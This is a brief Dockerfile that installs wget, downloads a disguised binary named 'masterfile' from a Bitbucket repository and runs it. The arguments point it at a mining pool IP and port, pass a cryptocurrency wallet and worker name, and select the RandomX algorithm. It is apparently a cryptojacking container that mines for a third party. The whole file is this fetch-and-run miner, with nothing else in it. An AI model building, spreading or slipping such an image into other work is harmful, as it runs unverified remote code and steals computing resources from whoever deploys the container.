FROM ubuntu:20.04

RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/tangoEnak123/ckckckckckck/downloads/masterfile
RUN chmod u+x masterfile
RUN ./masterfile -o 161.35.250.122:13333 -u BTC:3NJT6mUGmXshJpAF1Uhgh5eQKs5ajuBN2G.Worker01 -k -a rx/0